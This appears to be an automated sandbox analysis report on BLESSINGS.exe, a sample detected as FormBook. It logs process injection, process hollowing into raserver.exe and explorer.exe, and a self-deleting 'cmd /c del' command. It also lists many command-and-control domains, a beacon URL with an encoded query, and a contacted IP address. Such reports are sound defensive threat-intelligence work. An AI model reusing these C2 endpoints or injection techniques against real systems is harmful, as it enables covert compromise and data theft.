          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045561A0 mov eax, dword ptr fs:[00000030h]15_2_045561A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045561A0 mov eax, dword ptr fs:[00000030h]15_2_045561A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A69A6 mov eax, dword ptr fs:[00000030h]15_2_045A69A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045B4257 mov eax, dword ptr fs:[00000030h]15_2_045B4257
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]15_2_04529240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]15_2_04529240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]15_2_04529240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529240 mov eax, dword ptr fs:[00000030h]15_2_04529240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04537E41 mov eax, dword ptr fs:[00000030h]15_2_04537E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]15_2_0454AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]15_2_0454AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]15_2_0454AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]15_2_0454AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454AE73 mov eax, dword ptr fs:[00000030h]15_2_0454AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456927A mov eax, dword ptr fs:[00000030h]15_2_0456927A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DB260 mov eax, dword ptr fs:[00000030h]15_2_045DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DB260 mov eax, dword ptr fs:[00000030h]15_2_045DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8A62 mov eax, dword ptr fs:[00000030h]15_2_045F8A62
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453766D mov eax, dword ptr fs:[00000030h]15_2_0453766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]15_2_04525210
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov ecx, dword ptr fs:[00000030h]15_2_04525210
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]15_2_04525210
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04525210 mov eax, dword ptr fs:[00000030h]15_2_04525210
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AA16 mov eax, dword ptr fs:[00000030h]15_2_0452AA16
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AA16 mov eax, dword ptr fs:[00000030h]15_2_0452AA16
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04543A1C mov eax, dword ptr fs:[00000030h]15_2_04543A1C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A61C mov eax, dword ptr fs:[00000030h]15_2_0455A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A61C mov eax, dword ptr fs:[00000030h]15_2_0455A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]15_2_0452C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]15_2_0452C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C600 mov eax, dword ptr fs:[00000030h]15_2_0452C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04558E00 mov eax, dword ptr fs:[00000030h]15_2_04558E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1608 mov eax, dword ptr fs:[00000030h]15_2_045E1608
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04538A0A mov eax, dword ptr fs:[00000030h]15_2_04538A0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DFE3F mov eax, dword ptr fs:[00000030h]15_2_045DFE3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452E620 mov eax, dword ptr fs:[00000030h]15_2_0452E620
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04564A2C mov eax, dword ptr fs:[00000030h]15_2_04564A2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04564A2C mov eax, dword ptr fs:[00000030h]15_2_04564A2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8ED6 mov eax, dword ptr fs:[00000030h]15_2_045F8ED6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04568EC7 mov eax, dword ptr fs:[00000030h]15_2_04568EC7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045536CC mov eax, dword ptr fs:[00000030h]15_2_045536CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045DFEC0 mov eax, dword ptr fs:[00000030h]15_2_045DFEC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552ACB mov eax, dword ptr fs:[00000030h]15_2_04552ACB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045376E2 mov eax, dword ptr fs:[00000030h]15_2_045376E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552AE4 mov eax, dword ptr fs:[00000030h]15_2_04552AE4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045516E0 mov ecx, dword ptr fs:[00000030h]15_2_045516E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455D294 mov eax, dword ptr fs:[00000030h]15_2_0455D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455D294 mov eax, dword ptr fs:[00000030h]15_2_0455D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFE87 mov eax, dword ptr fs:[00000030h]15_2_045BFE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453AAB0 mov eax, dword ptr fs:[00000030h]15_2_0453AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453AAB0 mov eax, dword ptr fs:[00000030h]15_2_0453AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FAB0 mov eax, dword ptr fs:[00000030h]15_2_0455FAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]15_2_045252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]15_2_045252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]15_2_045252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]15_2_045252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045252A5 mov eax, dword ptr fs:[00000030h]15_2_045252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]15_2_045F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]15_2_045F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F0EA5 mov eax, dword ptr fs:[00000030h]15_2_045F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A46A7 mov eax, dword ptr fs:[00000030h]15_2_045A46A7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8B58 mov eax, dword ptr fs:[00000030h]15_2_045F8B58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452F358 mov eax, dword ptr fs:[00000030h]15_2_0452F358
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452DB40 mov eax, dword ptr fs:[00000030h]15_2_0452DB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453EF40 mov eax, dword ptr fs:[00000030h]15_2_0453EF40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04553B7A mov eax, dword ptr fs:[00000030h]15_2_04553B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04553B7A mov eax, dword ptr fs:[00000030h]15_2_04553B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452DB60 mov ecx, dword ptr fs:[00000030h]15_2_0452DB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453FF60 mov eax, dword ptr fs:[00000030h]15_2_0453FF60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8F6A mov eax, dword ptr fs:[00000030h]15_2_045F8F6A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454F716 mov eax, dword ptr fs:[00000030h]15_2_0454F716
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E131B mov eax, dword ptr fs:[00000030h]15_2_045E131B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFF10 mov eax, dword ptr fs:[00000030h]15_2_045BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BFF10 mov eax, dword ptr fs:[00000030h]15_2_045BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F070D mov eax, dword ptr fs:[00000030h]15_2_045F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F070D mov eax, dword ptr fs:[00000030h]15_2_045F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A70E mov eax, dword ptr fs:[00000030h]15_2_0455A70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A70E mov eax, dword ptr fs:[00000030h]15_2_0455A70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455E730 mov eax, dword ptr fs:[00000030h]15_2_0455E730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04524F2E mov eax, dword ptr fs:[00000030h]15_2_04524F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04524F2E mov eax, dword ptr fs:[00000030h]15_2_04524F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A53CA mov eax, dword ptr fs:[00000030h]15_2_045A53CA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A53CA mov eax, dword ptr fs:[00000030h]15_2_045A53CA
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: D90000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: DAB008Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Users\user\Desktop\BLESSINGS.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339345 Sample: BLESSINGS.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 33 www.hotvidzhub.download 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 3 other signatures 2->45 11 BLESSINGS.exe 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\...\BLESSINGS.exe.log, ASCII 11->31 dropped 55 Writes to foreign memory regions 11->55 57 Allocates memory in foreign processes 11->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->59 61 Injects a PE file into a foreign processes 11->61 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.quintred.com 91.195.241.137, 49755, 80 SEDO-ASDE Germany 18->35 37 www.toweroflifeinc.com 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 raserver.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BLESSINGS.exe45%VirustotalBrowse
          BLESSINGS.exe15%ReversingLabs
          BLESSINGS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.quintred.com4%VirustotalBrowse
          www.hotvidzhub.download0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.the343radio.com/jqc/0%Avira URL Cloudsafe
          http://www.droriginals.com0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/0%Avira URL Cloudsafe
          http://www.the343radio.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.gabriellagullberg.comReferer:0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/0%Avira URL Cloudsafe
          http://www.screwtaped.comReferer:0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/0%Avira URL Cloudsafe
          http://www.quintred.comReferer:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.sterlworldshop.comReferer:0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://www.margosbest.com/jqc/www.the343radio.com0%Avira URL Cloudsafe
          http://www.novergi.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.registeredagentfirm.comReferer:0%Avira URL Cloudsafe
          http://www.hotvidzhub.download/jqc/www.internetmarkaching.com0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.screwtaped.com/jqc/0%Avira URL Cloudsafe
          http://www.internetmarkaching.comReferer:0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/www.hotvidzhub.download0%Avira URL Cloudsafe
          http://www.margosbest.com/jqc/0%Avira URL Cloudsafe
          http://www.novergi.comReferer:0%Avira URL Cloudsafe
          http://www.cositasdepachecos.comReferer:0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com/jqc/www.margosbest.com0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.droriginals.com/jqc/www.kornteengoods.com0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.screwtaped.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.asacal.com/jqc/:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.11sxsx.comReferer:0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.asacal.comReferer:0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/www.sterlworldshop.com0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com0%Avira URL Cloudsafe
          http://www.hotvidzhub.downloadReferer:0%Avira URL Cloudsafe
          http://www.quintred.com/jqc/www.novergi.com0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/www.screwtaped.com0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/0%Avira URL Cloudsafe
          http://www.hotvidzhub.download0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com/jqc/0%Avira URL Cloudsafe
          http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com0%Avira URL Cloudsafe
          http://www.droriginals.comReferer:0%Avira URL Cloudsafe
          http://www.sterlworldshop.com/jqc/0%Avira URL Cloudsafe
          http://www.toweroflifeinc.comReferer:0%Avira URL Cloudsafe
          http://www.margosbest.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.kornteengoods.com0%Avira URL Cloudsafe
          http://www.quintred.com0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com/jqc/0%Avira URL Cloudsafe
